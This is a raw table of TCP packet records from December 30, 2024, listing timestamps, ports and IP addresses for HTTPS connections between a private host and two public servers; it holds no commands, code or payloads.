                                                                  Dec 30, 2024 22:42:39.527842999 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.527888060 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.527947903 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.528816938 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.528841972 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.528898954 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.529804945 CET58510443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.529822111 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.530323982 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.530339956 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.530683041 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.530711889 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.531430960 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.531445026 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.531830072 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.531848907 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.948422909 CET44358508188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.948719025 CET58508443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.948746920 CET44358508188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.949688911 CET44358508188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.949754000 CET58508443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.950562954 CET58508443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.950572968 CET58508443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.950614929 CET44358508188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.950630903 CET58508443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.950664997 CET58508443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.951004982 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.951112986 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.951180935 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.951437950 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:39.951472998 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.976069927 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.976285934 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.976309061 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.976763964 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.977057934 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.977135897 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.977236032 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.983714104 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.984096050 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.984141111 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.984505892 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.984692097 CET58510443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.984709978 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.985007048 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.985047102 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.985116959 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.985625029 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.985692024 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.986136913 CET58510443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.986213923 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.986466885 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.986489058 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.986623049 CET58510443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.986637115 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.987134933 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.987494946 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.987510920 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.988420010 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.988507986 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.989012003 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.989073038 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:39.989614964 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:39.989629030 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.005633116 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.007209063 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.007222891 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.008075953 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.008145094 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.008443117 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.008493900 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.008609056 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.008615971 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.016324043 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.016525030 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.016540051 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.017654896 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.017709970 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.018017054 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.018088102 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.018210888 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.018210888 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.018222094 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.023328066 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.030698061 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.030698061 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.059333086 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.061254978 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.061255932 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.173405886 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.173475981 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.173566103 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.175029993 CET58514443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.175085068 CET44358514188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.177419901 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.177460909 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.177535057 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.177774906 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.177788019 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.245150089 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.245234966 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.246396065 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.246637106 CET58512443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.246659994 CET44358512188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.248379946 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.248475075 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.248539925 CET58510443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.248927116 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.248954058 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.249265909 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.249506950 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.249517918 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.249857903 CET58510443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.249871016 CET44358510188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.251764059 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.251780033 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.251837969 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.252012014 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.252022982 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.268815994 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.268878937 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.268918037 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.268959045 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.268974066 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.268990993 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.269005060 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.269037008 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.269499063 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.269548893 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.269555092 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.269593000 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.269598007 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.269659996 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.270252943 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.270257950 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.281806946 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.281900883 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.282800913 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.283010960 CET58513443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.283023119 CET44358513188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.284854889 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.284939051 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.285011053 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.285204887 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.285232067 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.314397097 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.314404011 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.318808079 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.318887949 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.318955898 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.320494890 CET58511443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.320506096 CET44358511188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.322527885 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.322546005 CET44358521188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.322628021 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.322788000 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.322802067 CET44358521188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.357809067 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.357870102 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.357873917 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.357883930 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.357922077 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.357928991 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358004093 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358043909 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358084917 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358088970 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.358097076 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358130932 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.358434916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358473063 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358491898 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.358496904 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358540058 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358583927 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.358589888 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.358628035 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.359348059 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.359416008 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.359457016 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.359497070 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.359505892 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.359510899 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.359539032 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.360086918 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.360124111 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.360133886 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.360138893 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.360876083 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.400125980 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.428208113 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.430072069 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.430113077 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.431091070 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.431164026 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.431510925 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.431576967 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.431663036 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.446290970 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446353912 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446389914 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446432114 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446472883 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446508884 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446515083 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.446525097 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446554899 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.446583986 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.446861029 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446907043 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446912050 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.446918964 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.446959019 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.446966887 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.447021008 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.447828054 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.447874069 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.447890997 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.447895050 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.447921038 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.447923899 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.447947025 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.447952032 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.447973013 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.448884010 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.448931932 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.448940039 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.448945045 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.448981047 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.449700117 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.449752092 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.449754000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.449764967 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.449815035 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.449825048 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.449836016 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.449871063 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.450643063 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.450727940 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.479362965 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.481204987 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.481225967 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.490406036 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.490473986 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.528455973 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.536395073 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.536453009 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.536487103 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.536493063 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.536534071 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.536566973 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.536627054 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.536829948 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.536885977 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.537024021 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.537060976 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.537075996 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.537080050 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.537106037 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.537123919 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.537128925 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.537141085 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.537168980 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.537189960 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.537239075 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.537245035 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.537348032 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.538831949 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.538897991 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.538908958 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.538913965 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.538949013 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.538980961 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539210081 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539258003 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539268017 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539272070 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539299965 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539304972 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539324999 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539330006 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539355040 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539355993 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539405107 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539407969 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539424896 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539459944 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539478064 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539525986 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539530993 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539567947 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539596081 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539633989 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539645910 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539649010 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539678097 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539697886 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539773941 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539825916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539836884 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539840937 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.539871931 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.539890051 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.540486097 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.540541887 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.540560961 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.540565014 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.540597916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.540597916 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.540611029 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.540615082 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.540642023 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.540644884 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.540693045 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.540698051 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.540734053 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.556087971 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556162119 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556190014 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556221962 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556230068 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.556271076 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556298971 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.556318998 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556349039 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556361914 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.556371927 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556387901 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556418896 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.556459904 CET44358516188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.556509972 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.557817936 CET58516443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:40.557851076 CET44358516188.114.97.3192.168.2.4
